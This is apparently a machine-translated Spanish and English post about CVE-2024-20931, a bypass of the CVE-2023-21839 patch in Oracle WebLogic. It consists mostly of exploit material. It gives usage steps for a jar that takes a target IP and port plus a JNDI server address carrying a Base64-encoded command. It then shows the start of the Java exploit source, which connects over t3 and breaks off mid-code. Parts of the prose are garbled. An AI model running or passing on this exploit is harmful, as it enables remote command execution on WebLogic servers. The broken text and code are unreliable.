
Esta vulnerabilidad omite el parche CVE-2023-21839 en Oracle WebLogic.
Este artículo profundiza en la mecánica de la vulnerabilidad, demuestra sus usos y proporciona información sobre su desarrollo e impacto en el mundo de la ciberseguridad.
CVE-2024-20931, que es una omisión del parche CVE-2023-21839 de Oracle Weblogic
Uso: Establecer JNDI, específico uno
Desarrollo:
java -jar CVE-2024-20931.jar
Please input target IP:127.0.0.1
Please input target port:7001
Please input RMI Address(ip:port/exp):JNDISERVER:1389/Basic/Command/Base64/BASE64COMMANDnotas:
This is reworked from (thank you), also at all come from the
Java version "1.8.0_151", is required for JNDIExploit as well as for the current CVE.Practica el uso de la ventana acoplable ambiente Se admiten comandos limitados, por ejemplo, intente usar curl (sin ping/nslookup en la imagen).
import java.lang.reflect.Field;
import java.util.Hashtable;
import java.util.Scanner;
import javax.naming.InitialContext;
import javax.naming.NamingException;
import weblogic.deployment.jms.ForeignOpaqueReference;
public class MainClass {
public static void main(String[] args) throws NamingException, NoSuchFieldException, SecurityException, IllegalArgumentException, IllegalAccessException {
String JNDI_FACTORY = "weblogic.jndi.WLInitialContextFactory";
Scanner scanner = new Scanner(System.in);
System.out.print("Please input target IP:");
String targetIP = scanner.nextLine();
System.out.print("Please input target port:");
String targetPort = scanner.nextLine();
String url = "t3://" + targetIP + ":" + targetPort;
Hashtable








